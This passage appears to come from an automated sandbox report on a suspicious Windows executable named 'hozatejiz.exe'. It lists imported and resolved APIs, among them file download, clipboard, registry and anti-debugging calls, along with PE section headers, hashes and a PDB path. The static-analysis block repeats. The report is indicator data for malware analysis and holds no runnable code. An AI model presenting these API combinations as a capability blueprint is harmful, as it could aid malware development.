1241. "name": "UnhandledExceptionFilter",
1242. "address": "0x4260e4"
1243. },
1244. {
1245. "name": "SetUnhandledExceptionFilter",
1246. "address": "0x4260e8"
1247. },
1248. {
1249. "name": "InitializeCriticalSectionAndSpinCount",
1250. "address": "0x4260ec"
1251. },
1252. {
1253. "name": "CreateEventW",
1254. "address": "0x4260f0"
1255. },
1256. {
1257. "name": "Sleep",
1258. "address": "0x4260f4"
1259. },
1260. {
1261. "name": "GetCurrentProcess",
1262. "address": "0x4260f8"
1263. },
1264. {
1265. "name": "TerminateProcess",
1266. "address": "0x4260fc"
1267. },
1268. {
1269. "name": "TlsAlloc",
1270. "address": "0x426100"
1271. },
1272. {
1273. "name": "TlsGetValue",
1274. "address": "0x426104"
1275. },
1276. {
1277. "name": "TlsSetValue",
1278. "address": "0x426108"
1279. },
1280. {
1281. "name": "TlsFree",
1282. "address": "0x42610c"
1283. },
1284. {
1285. "name": "GetModuleHandleW",
1286. "address": "0x426110"
1287. },
1288. {
1289. "name": "CreateSemaphoreW",
1290. "address": "0x426114"
1291. },
1292. {
1293. "name": "SetStdHandle",
1294. "address": "0x426118"
1295. },
1296. {
1297. "name": "SetFilePointerEx",
1298. "address": "0x42611c"
1299. },
1300. {
1301. "name": "WriteConsoleW",
1302. "address": "0x426120"
1303. },
1304. {
1305. "name": "SetConsoleCtrlHandler",
1306. "address": "0x426124"
1307. },
1308. {
1309. "name": "FreeLibrary",
1310. "address": "0x426128"
1311. },
1312. {
1313. "name": "LoadLibraryExW",
1314. "address": "0x42612c"
1315. },
1316. {
1317. "name": "IsValidCodePage",
1318. "address": "0x426130"
1319. },
1320. {
1321. "name": "GetACP",
1322. "address": "0x426134"
1323. },
1324. {
1325. "name": "GetOEMCP",
1326. "address": "0x426138"
1327. },
1328. {
1329. "name": "GetCPInfo",
1330. "address": "0x42613c"
1331. },
1332. {
1333. "name": "HeapReAlloc",
1334. "address": "0x426140"
1335. },
1336. {
1337. "name": "GetDateFormatW",
1338. "address": "0x426144"
1339. },
1340. {
1341. "name": "GetTimeFormatW",
1342. "address": "0x426148"
1343. },
1344. {
1345. "name": "CompareStringW",
1346. "address": "0x42614c"
1347. },
1348. {
1349. "name": "LCMapStringW",
1350. "address": "0x426150"
1351. },
1352. {
1353. "name": "GetLocaleInfoW",
1354. "address": "0x426154"
1355. },
1356. {
1357. "name": "IsValidLocale",
1358. "address": "0x426158"
1359. },
1360. {
1361. "name": "GetUserDefaultLCID",
1362. "address": "0x42615c"
1363. },
1364. {
1365. "name": "EnumSystemLocalesW",
1366. "address": "0x426160"
1367. },
1368. {
1369. "name": "OutputDebugStringW",
1370. "address": "0x426164"
1371. },
1372. {
1373. "name": "GetStringTypeW",
1374. "address": "0x426168"
1375. },
1376. {
1377. "name": "CreateFileW",
1378. "address": "0x42616c"
1379. }
1380. ],
1381. "dll": "KERNEL32.dll"
1382. }
1383. ],
1384. "digital_signers": null,
1385. "exported_dll_name": "hozatejiz.exe",
1386. "actual_checksum": "0x00044ae0",
1387. "overlay": null,
1388. "imagebase": "0x00400000",
1389. "reported_checksum": "0x00044ae0",
1390. "icon_hash": null,
1391. "entrypoint": "0x00403a61",
1392. "timestamp": "2018-06-17 04:22:09",
1393. "osversion": "5.1",
1394. "sections": [
1395. {
1396. "name": ".text",
1397. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
1398. "virtual_address": "0x00001000",
1399. "size_of_data": "0x00025000",
1400. "entropy": "6.72",
1401. "raw_address": "0x00000400",
1402. "virtual_size": "0x00024ebd",
1403. "characteristics_raw": "0x60000020"
1404. },
1405. {
1406. "name": ".rdata",
1407. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
1408. "virtual_address": "0x00026000",
1409. "size_of_data": "0x00009000",
1410. "entropy": "4.71",
1411. "raw_address": "0x00025400",
1412. "virtual_size": "0x00008ee0",
1413. "characteristics_raw": "0x40000040"
1414. },
1415. {
1416. "name": ".data",
1417. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
1418. "virtual_address": "0x0002f000",
1419. "size_of_data": "0x00001a00",
1420. "entropy": "3.42",
1421. "raw_address": "0x0002e400",
1422. "virtual_size": "0x04e5d9ec",
1423. "characteristics_raw": "0xc0000040"
1424. },
1425. {
1426. "name": ".text",
1427. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
1428. "virtual_address": "0x04e8d000",
1429. "size_of_data": "0x00009a00",
1430. "entropy": "6.00",
1431. "raw_address": "0x0002fe00",
1432. "virtual_size": "0x0000998c",
1433. "characteristics_raw": "0xc0000040"
1434. },
1435. {
1436. "name": ".yum",
1437. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
1438. "virtual_address": "0x04e97000",
1439. "size_of_data": "0x00000400",
1440. "entropy": "0.00",
1441. "raw_address": "0x00039800",
1442. "virtual_size": "0x00001200",
1443. "characteristics_raw": "0xc0000040"
1444. },
1445. {
1446. "name": ".rsrc",
1447. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
1448. "virtual_address": "0x04e99000",
1449. "size_of_data": "0x00002200",
1450. "entropy": "4.72",
1451. "raw_address": "0x00039c00",
1452. "virtual_size": "0x00002148",
1453. "characteristics_raw": "0x40000040"
1454. },
1455. {
1456. "name": ".reloc",
1457. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
1458. "virtual_address": "0x04e9c000",
1459. "size_of_data": "0x00002000",
1460. "entropy": "6.62",
1461. "raw_address": "0x0003be00",
1462. "virtual_size": "0x00001fcc",
1463. "characteristics_raw": "0x42000040"
1464. }
1465. ],
1466. "resources": [],
1467. "dirents": [
1468. {
1469. "virtual_address": "0x0002e630",
1470. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
1471. "size": "0x0000004d"
1472. },
1473. {
1474. "virtual_address": "0x0002e680",
1475. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
1476. "size": "0x00000028"
1477. },
1478. {
1479. "virtual_address": "0x04e99000",
1480. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
1481. "size": "0x00002148"
1482. },
1483. {
1484. "virtual_address": "0x00000000",
1485. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
1486. "size": "0x00000000"
1487. },
1488. {
1489. "virtual_address": "0x00000000",
1490. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
1491. "size": "0x00000000"
1492. },
1493. {
1494. "virtual_address": "0x04e9c000",
1495. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
1496. "size": "0x00001fcc"
1497. },
1498. {
1499. "virtual_address": "0x000261d0",
1500. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
1501. "size": "0x00000038"
1502. },
1503. {
1504. "virtual_address": "0x00000000",
1505. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
1506. "size": "0x00000000"
1507. },
1508. {
1509. "virtual_address": "0x00000000",
1510. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
1511. "size": "0x00000000"
1512. },
1513. {
1514. "virtual_address": "0x00000000",
1515. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
1516. "size": "0x00000000"
1517. },
1518. {
1519. "virtual_address": "0x00000000",
1520. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
1521. "size": "0x00000000"
1522. },
1523. {
1524. "virtual_address": "0x00000000",
1525. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
1526. "size": "0x00000000"
1527. },
1528. {
1529. "virtual_address": "0x00026000",
1530. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
1531. "size": "0x00000174"
1532. },
1533. {
1534. "virtual_address": "0x00000000",
1535. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
1536. "size": "0x00000000"
1537. },
1538. {
1539. "virtual_address": "0x00000000",
1540. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
1541. "size": "0x00000000"
1542. },
1543. {
1544. "virtual_address": "0x00000000",
1545. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
1546. "size": "0x00000000"
1547. }
1548. ],
1549. "exports": [
1550. {
1551. "ordinal": 1,
1552. "name": "MyFunc165@@4",
1553. "address": "0x425db0"
1554. }
1555. ],
1556. "guest_signers": {},
1557. "imphash": "e4ef01da1d05a7641f1f800f164dcec2",
1558. "icon_fuzzy": null,
1559. "icon": null,
1560. "pdbpath": "C:\\xaserohakapebeh-jeron74_nonokacideyebiwac71_s.pdb\\x00\\bin\\hozatejiz.pdb\\x00\\x00\\x00\\x00\\x00\\x9d\\x00\\x00\\x00\\x9d",
1561. "imported_dll_count": 1,
1562. "versioninfo": []
1563. }
1564. }
1565.  
1566. [*] Resolved APIs: [
1567. "kernel32.dll.FlsAlloc",
1568. "kernel32.dll.FlsFree",
1569. "kernel32.dll.FlsGetValue",
1570. "kernel32.dll.FlsSetValue",
1571. "kernel32.dll.InitializeCriticalSectionEx",
1572. "kernel32.dll.CreateEventExW",
1573. "kernel32.dll.CreateSemaphoreExW",
1574. "kernel32.dll.SetThreadStackGuarantee",
1575. "kernel32.dll.CreateThreadpoolTimer",
1576. "kernel32.dll.SetThreadpoolTimer",
1577. "kernel32.dll.WaitForThreadpoolTimerCallbacks",
1578. "kernel32.dll.CloseThreadpoolTimer",
1579. "kernel32.dll.CreateThreadpoolWait",
1580. "kernel32.dll.SetThreadpoolWait",
1581. "kernel32.dll.CloseThreadpoolWait",
1582. "kernel32.dll.FlushProcessWriteBuffers",
1583. "kernel32.dll.FreeLibraryWhenCallbackReturns",
1584. "kernel32.dll.GetCurrentProcessorNumber",
1585. "kernel32.dll.GetLogicalProcessorInformation",
1586. "kernel32.dll.CreateSymbolicLinkW",
1587. "kernel32.dll.EnumSystemLocalesEx",
1588. "kernel32.dll.CompareStringEx",
1589. "kernel32.dll.GetDateFormatEx",
1590. "kernel32.dll.GetLocaleInfoEx",
1591. "kernel32.dll.GetTimeFormatEx",
1592. "kernel32.dll.GetUserDefaultLocaleName",
1593. "kernel32.dll.IsValidLocaleName",
1594. "kernel32.dll.LCMapStringEx",
1595. "kernel32.dll.GetTickCount64",
1596. "kernel32.dll.LoadLibraryA",
1597. "kernel32.dll.VirtualAlloc",
1598. "kernel32.dll.VirtualProtect",
1599. "kernel32.dll.VirtualFree",
1600. "kernel32.dll.GetVersionExA",
1601. "kernel32.dll.TerminateProcess",
1602. "kernel32.dll.ExitProcess",
1603. "kernel32.dll.SetErrorMode",
1604. "msvcrt.dll._controlfp",
1605. "msvcrt.dll._except_handler3",
1606. "msvcrt.dll.__set_app_type",
1607. "msvcrt.dll.__p__fmode",
1608. "msvcrt.dll.isalpha",
1609. "msvcrt.dll.__p__commode",
1610. "msvcrt.dll._adjust_fdiv",
1611. "msvcrt.dll.__setusermatherr",
1612. "msvcrt.dll._initterm",
1613. "msvcrt.dll.__getmainargs",
1614. "msvcrt.dll._acmdln",
1615. "msvcrt.dll.exit",
1616. "msvcrt.dll._XcptFilter",
1617. "msvcrt.dll._exit",
1618. "msvcrt.dll._snprintf",
1619. "msvcrt.dll.fclose",
1620. "msvcrt.dll.fseek",
1621. "msvcrt.dll.ftell",
1622. "msvcrt.dll.wcsstr",
1623. "msvcrt.dll._wfopen",
1624. "msvcrt.dll.srand",
1625. "msvcrt.dll.rand",
1626. "msvcrt.dll._snwprintf",
1627. "msvcrt.dll.isdigit",
1628. "msvcrt.dll.memset",
1629. "msvcrt.dll.memcpy",
1630. "wininet.dll.InternetOpenUrlA",
1631. "wininet.dll.HttpQueryInfoA",
1632. "wininet.dll.InternetCloseHandle",
1633. "wininet.dll.InternetReadFile",
1634. "wininet.dll.InternetOpenUrlW",
1635. "wininet.dll.InternetOpenW",
1636. "wininet.dll.InternetOpenA",
1637. "urlmon.dll.URLDownloadToFileW",
1638. "shlwapi.dll.PathFileExistsW",
1639. "shlwapi.dll.PathFindFileNameA",
1640. "shlwapi.dll.PathFindFileNameW",
1641. "kernel32.dll.GetModuleFileNameW",
1642. "kernel32.dll.GetFileAttributesW",
1643. "kernel32.dll.CopyFileW",
1644. "kernel32.dll.CreateDirectoryW",
1645. "kernel32.dll.GetLogicalDriveStringsW",
1646. "kernel32.dll.GetDriveTypeW",
1647. "kernel32.dll.FindFirstFileW",
1648. "kernel32.dll.ExpandEnvironmentStringsW",
1649. "kernel32.dll.DeleteFileW",
1650. "kernel32.dll.CloseHandle",
1651. "kernel32.dll.FindClose",
1652. "kernel32.dll.WriteFile",
1653. "kernel32.dll.GetTickCount",
1654. "kernel32.dll.GlobalUnlock",
1655. "kernel32.dll.Sleep",
1656. "kernel32.dll.GlobalAlloc",
1657. "kernel32.dll.GlobalLock",
1658. "kernel32.dll.IsDebuggerPresent",
1659. "kernel32.dll.GetModuleHandleA",
1660. "kernel32.dll.Process32First",
1661. "kernel32.dll.Process32Next",
1662. "kernel32.dll.FindNextFileW",
1663. "kernel32.dll.SetFileAttributesW",
1664. "kernel32.dll.GetVolumeInformationW",
1665. "kernel32.dll.CreateFileW",
1666. "kernel32.dll.ExitThread",
1667. "kernel32.dll.GetStartupInfoA",
1668. "kernel32.dll.CreateThread",
1669. "kernel32.dll.CreateMutexA",
1670. "kernel32.dll.GetLastError",
1671. "kernel32.dll.CreateToolhelp32Snapshot",
1672. "kernel32.dll.CreateProcessW",
1673. "user32.dll.SetClipboardData",
1674. "user32.dll.OpenClipboard",
1675. "user32.dll.EmptyClipboard",
1676. "user32.dll.GetClipboardData",
1677. "user32.dll.CloseClipboard",
1678. "user32.dll.CharUpperA",
1679. "advapi32.dll.RegCreateKeyExA",
1680. "advapi32.dll.RegCloseKey",
1681. "advapi32.dll.RegSetValueExW",
1682. "advapi32.dll.RegOpenKeyExW",
1683. "shell32.dll.ShellExecuteW",
1684. "ole32.dll.CoInitialize",
1685. "ole32.dll.CoCreateInstance",
1686. "msvcr100.dll.atexit",
1687. "rasapi32.dll.RasConnectionNotificationW",
1688. "sechost.dll.NotifyServiceStatusChangeA",
1689. "cryptbase.dll.SystemFunction036"
1690. ]
1691.  
1692. [*] Static Analysis: {
1693. "pe": {
1694. "peid_signatures": null,
1695. "imports": [
1696. {
1697. "imports": [
1698. {
1699. "name": "ExitProcess",
1700. "address": "0x426000"
1701. },
1702. {
1703. "name": "DebugActiveProcessStop",
1704. "address": "0x426004"
1705. },
1706. {
1707. "name": "lstrcpynA",
1708. "address": "0x426008"
1709. },
1710. {
1711. "name": "UnlockFile",
1712. "address": "0x42600c"
1713. },
1714. {
1715. "name": "GetFileAttributesExA",
1716. "address": "0x426010"
1717. },
1718. {
1719. "name": "GetTickCount",
1720. "address": "0x426014"
1721. },
1722. {
1723. "name": "GetNumberFormatA",
1724. "address": "0x426018"
1725. },
1726. {
1727. "name": "GlobalAlloc",
1728. "address": "0x42601c"
1729. },
1730. {
1731. "name": "LoadLibraryW",
1732. "address": "0x426020"
1733. },
1734. {
1735. "name": "GetConsoleAliasExesLengthW",
1736. "address": "0x426024"
1737. },
1738. {
1739. "name": "GetBinaryTypeA",
1740. "address": "0x426028"
1741. },
1742. {
1743. "name": "lstrlenW",
1744. "address": "0x42602c"
1745. },
1746. {
1747. "name": "Module32First",
1748. "address": "0x426030"
1749. },
1750. {
1751. "name": "GetLastError",
1752. "address": "0x426034"
1753. },
1754. {
1755. "name": "GetProcAddress",
1756. "address": "0x426038"
1757. },
1758. {
1759. "name": "PeekConsoleInputW",
1760. "address": "0x42603c"
1761. },
1762. {
1763. "name": "WTSGetActiveConsoleSessionId",
1764. "address": "0x426040"
1765. },
1766. {
1767. "name": "VirtualProtect",
1768. "address": "0x426044"
1769. },
1770. {
1771. "name": "CreateToolhelp32Snapshot",
1772. "address": "0x426048"
1773. },
1774. {
1775. "name": "GetCPInfoExA",
1776. "address": "0x42604c"
1777. },
1778. {
1779. "name": "CloseHandle",
1780. "address": "0x426050"
1781. },
1782. {
1783. "name": "EncodePointer",
1784. "address": "0x426054"
1785. },
1786. {
1787. "name": "DecodePointer",
1788. "address": "0x426058"
1789. },
1790. {
1791. "name": "GetCommandLineA",
1792. "address": "0x42605c"
1793. },
1794. {
1795. "name": "RaiseException",
1796. "address": "0x426060"
1797. },
1798. {
1799. "name": "RtlUnwind",
1800. "address": "0x426064"
1801. },
1802. {
1803. "name": "IsDebuggerPresent",
1804. "address": "0x426068"
1805. },
1806. {
1807. "name": "IsProcessorFeaturePresent",
1808. "address": "0x42606c"
1809. },
1810. {
1811. "name": "EnterCriticalSection",
1812. "address": "0x426070"
1813. },
1814. {
1815. "name": "LeaveCriticalSection",
1816. "address": "0x426074"
1817. },
1818. {
1819. "name": "FlushFileBuffers",
1820. "address": "0x426078"
1821. },
1822. {
1823. "name": "WriteFile",
1824. "address": "0x42607c"
1825. },
1826. {
1827. "name": "WideCharToMultiByte",
1828. "address": "0x426080"
1829. },
1830. {
1831. "name": "GetConsoleCP",
1832. "address": "0x426084"
1833. },
1834. {
1835. "name": "GetConsoleMode",
1836. "address": "0x426088"
1837. },
1838. {
1839. "name": "DeleteCriticalSection",
1840. "address": "0x42608c"
1841. },
1842. {
1843. "name": "FatalAppExitA",
1844. "address": "0x426090"
1845. },
1846. {
1847. "name": "GetModuleHandleExW",
1848. "address": "0x426094"
1849. },
1850. {
1851. "name": "AreFileApisANSI",
1852. "address": "0x426098"
1853. },
1854. {
1855. "name": "MultiByteToWideChar",
1856. "address": "0x42609c"
1857. },
1858. {
1859. "name": "HeapSize",
1860. "address": "0x4260a0"
1861. },
1862. {
1863. "name": "HeapFree",
1864. "address": "0x4260a4"
1865. },
1866. {
1867. "name": "HeapAlloc",
1868. "address": "0x4260a8"
1869. },
1870. {
1871. "name": "SetLastError",
1872. "address": "0x4260ac"
1873. },
1874. {
1875. "name": "GetCurrentThread",
1876. "address": "0x4260b0"
1877. },
1878. {
1879. "name": "GetCurrentThreadId",
1880. "address": "0x4260b4"
1881. },
1882. {
1883. "name": "GetProcessHeap",
1884. "address": "0x4260b8"
1885. },
1886. {
1887. "name": "GetStdHandle",
1888. "address": "0x4260bc"
1889. },
1890. {
1891. "name": "GetFileType",
1892. "address": "0x4260c0"
1893. },
1894. {
1895. "name": "GetStartupInfoW",
1896. "address": "0x4260c4"
1897. },
1898. {
1899. "name": "GetModuleFileNameA",
1900. "address": "0x4260c8"
1901. },
1902. {
1903. "name": "GetModuleFileNameW",
1904. "address": "0x4260cc"
1905. },
1906. {
1907. "name": "QueryPerformanceCounter",
1908. "address": "0x4260d0"
1909. },
1910. {
1911. "name": "GetCurrentProcessId",
1912. "address": "0x4260d4"
1913. },
1914. {
1915. "name": "GetSystemTimeAsFileTime",
1916. "address": "0x4260d8"
1917. },
1918. {
1919. "name": "GetEnvironmentStringsW",
1920. "address": "0x4260dc"
1921. },
1922. {
1923. "name": "FreeEnvironmentStringsW",
1924. "address": "0x4260e0"
1925. },
1926. {
1927. "name": "UnhandledExceptionFilter",
1928. "address": "0x4260e4"
1929. },
1930. {
1931. "name": "SetUnhandledExceptionFilter",
1932. "address": "0x4260e8"
1933. },
1934. {
1935. "name": "InitializeCriticalSectionAndSpinCount",
1936. "address": "0x4260ec"
1937. },
1938. {
1939. "name": "CreateEventW",
1940. "address": "0x4260f0"
1941. },
1942. {
1943. "name": "Sleep",
1944. "address": "0x4260f4"
1945. },
1946. {
1947. "name": "GetCurrentProcess",
1948. "address": "0x4260f8"
1949. },
1950. {
1951. "name": "TerminateProcess",
1952. "address": "0x4260fc"
1953. },
1954. {
1955. "name": "TlsAlloc",
1956. "address": "0x426100"
1957. },
1958. {
1959. "name": "TlsGetValue",
1960. "address": "0x426104"
1961. },
1962. {
1963. "name": "TlsSetValue",
1964. "address": "0x426108"
1965. },
1966. {
1967. "name": "TlsFree",
1968. "address": "0x42610c"
1969. },
1970. {
1971. "name": "GetModuleHandleW",
1972. "address": "0x426110"
1973. },
1974. {
1975. "name": "CreateSemaphoreW",
1976. "address": "0x426114"
1977. },
1978. {
1979. "name": "SetStdHandle",
1980. "address": "0x426118"
1981. },
1982. {
1983. "name": "SetFilePointerEx",
1984. "address": "0x42611c"
1985. },
1986. {
1987. "name": "WriteConsoleW",
1988. "address": "0x426120"
1989. },
1990. {
1991. "name": "SetConsoleCtrlHandler",
1992. "address": "0x426124"
1993. },
1994. {
1995. "name": "FreeLibrary",
1996. "address": "0x426128"
1997. },
1998. {
1999. "name": "LoadLibraryExW",
2000. "address": "0x42612c"
2001. },
2002. {
2003. "name": "IsValidCodePage",
2004. "address": "0x426130"
2005. },
2006. {
2007. "name": "GetACP",
2008. "address": "0x426134"
2009. },
2010. {
2011. "name": "GetOEMCP",
2012. "address": "0x426138"
2013. },
2014. {
2015. "name": "GetCPInfo",
2016. "address": "0x42613c"
2017. },
2018. {
2019. "name": "HeapReAlloc",
2020. "address": "0x426140"
2021. },
2022. {
2023. "name": "GetDateFormatW",
2024. "address": "0x426144"
2025. },
2026. {
2027. "name": "GetTimeFormatW",
2028. "address": "0x426148"
2029. },
2030. {
2031. "name": "CompareStringW",
2032. "address": "0x42614c"
2033. },
2034. {
2035. "name": "LCMapStringW",
2036. "address": "0x426150"
2037. },
2038. {
2039. "name": "GetLocaleInfoW",
2040. "address": "0x426154"
2041. },
2042. {
2043. "name": "IsValidLocale",
2044. "address": "0x426158"
2045. },
2046. {
2047. "name": "GetUserDefaultLCID",
2048. "address": "0x42615c"
2049. },
2050. {
2051. "name": "EnumSystemLocalesW",
2052. "address": "0x426160"
2053. },
2054. {
2055. "name": "OutputDebugStringW",
2056. "address": "0x426164"
2057. },
2058. {
2059. "name": "GetStringTypeW",
2060. "address": "0x426168"
2061. },
2062. {
2063. "name": "CreateFileW",
2064. "address": "0x42616c"
2065. }
2066. ],
2067. "dll": "KERNEL32.dll"
2068. }
2069. ],
2070. "digital_signers": null,
2071. "exported_dll_name": "hozatejiz.exe",
2072. "actual_checksum": "0x00044ae0",
2073. "overlay": null,
2074. "imagebase": "0x00400000",
2075. "reported_checksum": "0x00044ae0",
2076. "icon_hash": null,
2077. "entrypoint": "0x00403a61",
2078. "timestamp": "2018-06-17 04:22:09",
2079. "osversion": "5.1",
2080. "sections": [
2081. {
2082. "name": ".text",
2083. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
2084. "virtual_address": "0x00001000",
2085. "size_of_data": "0x00025000",
2086. "entropy": "6.72",
2087. "raw_address": "0x00000400",
2088. "virtual_size": "0x00024ebd",
2089. "characteristics_raw": "0x60000020"
2090. },
2091. {
2092. "name": ".rdata",
2093. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
2094. "virtual_address": "0x00026000",
2095. "size_of_data": "0x00009000",
2096. "entropy": "4.71",
2097. "raw_address": "0x00025400",
2098. "virtual_size": "0x00008ee0",
2099. "characteristics_raw": "0x40000040"
2100. },
2101. {
2102. "name": ".data",
2103. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
2104. "virtual_address": "0x0002f000",
2105. "size_of_data": "0x00001a00",
2106. "entropy": "3.42",
2107. "raw_address": "0x0002e400",
2108. "virtual_size": "0x04e5d9ec",
2109. "characteristics_raw": "0xc0000040"
2110. },
2111. {
2112. "name": ".text",
2113. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
2114. "virtual_address": "0x04e8d000",
2115. "size_of_data": "0x00009a00",
2116. "entropy": "6.00",
2117. "raw_address": "0x0002fe00",
2118. "virtual_size": "0x0000998c",
2119. "characteristics_raw": "0xc0000040"
2120. },
2121. {
2122. "name": ".yum",
2123. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
2124. "virtual_address": "0x04e97000",
2125. "size_of_data": "0x00000400",
2126. "entropy": "0.00",
2127. "raw_address": "0x00039800",
2128. "virtual_size": "0x00001200",
2129. "characteristics_raw": "0xc0000040"
2130. },
2131. {
2132. "name": ".rsrc",
2133. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
2134. "virtual_address": "0x04e99000",
2135. "size_of_data": "0x00002200",
2136. "entropy": "4.72",
2137. "raw_address": "0x00039c00",
2138. "virtual_size": "0x00002148",
2139. "characteristics_raw": "0x40000040"
2140. },
2141. {
2142. "name": ".reloc",
2143. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
2144. "virtual_address": "0x04e9c000",
2145. "size_of_data": "0x00002000",
2146. "entropy": "6.62",
2147. "raw_address": "0x0003be00",
2148. "virtual_size": "0x00001fcc",
2149. "characteristics_raw": "0x42000040"
2150. }
2151. ],
2152. "resources": [],
2153. "dirents": [
2154. {
2155. "virtual_address": "0x0002e630",
2156. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
2157. "size": "0x0000004d"
2158. },
2159. {
2160. "virtual_address": "0x0002e680",
2161. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
2162. "size": "0x00000028"
2163. },
2164. {
2165. "virtual_address": "0x04e99000",
2166. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
2167. "size": "0x00002148"
2168. },
2169. {
2170. "virtual_address": "0x00000000",
2171. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
2172. "size": "0x00000000"
2173. },
2174. {
2175. "virtual_address": "0x00000000",
2176. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
2177. "size": "0x00000000"
2178. },
2179. {
2180. "virtual_address": "0x04e9c000",
2181. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
2182. "size": "0x00001fcc"
2183. },
2184. {
2185. "virtual_address": "0x000261d0",
2186. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
2187. "size": "0x00000038"
2188. },
2189. {
2190. "virtual_address": "0x00000000",
2191. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
2192. "size": "0x00000000"
2193. },
2194. {
2195. "virtual_address": "0x00000000",
2196. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
2197. "size": "0x00000000"
2198. },
2199. {
2200. "virtual_address": "0x00000000",
2201. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
2202. "size": "0x00000000"
2203. },
2204. {
2205. "virtual_address": "0x00000000",
2206. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
2207. "size": "0x00000000"
2208. },
2209. {
2210. "virtual_address": "0x00000000",
2211. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
2212. "size": "0x00000000"
2213. },
2214. {
2215. "virtual_address": "0x00026000",
2216. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
2217. "size": "0x00000174"
2218. },
2219. {
2220. "virtual_address": "0x00000000",
2221. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
2222. "size": "0x00000000"
2223. },
2224. {
2225. "virtual_address": "0x00000000",
2226. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
2227. "size": "0x00000000"
2228. },
2229. {
2230. "virtual_address": "0x00000000",
2231. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
2232. "size": "0x00000000"
2233. }
2234. ],
2235. "exports": [
2236. {
2237. "ordinal": 1,
2238. "name": "MyFunc165@@4",
2239. "address": "0x425db0"
2240. }
2241. ],
2242. "guest_signers": {},
2243. "imphash": "e4ef01da1d05a7641f1f800f164dcec2",
2244. "icon_fuzzy": null,
2245. "icon": null,
2246. "pdbpath": "C:\\xaserohakapebeh-jeron74_nonokacideyebiwac71_s.pdb\\x00\\bin\\hozatejiz.pdb\\x00\\x00\\x00\\x00\\x00\\x9d\\x00\\x00\\x00\\x9d",
2247. "imported_dll_count": 1,
2248. "versioninfo": []
2249. }
2250. }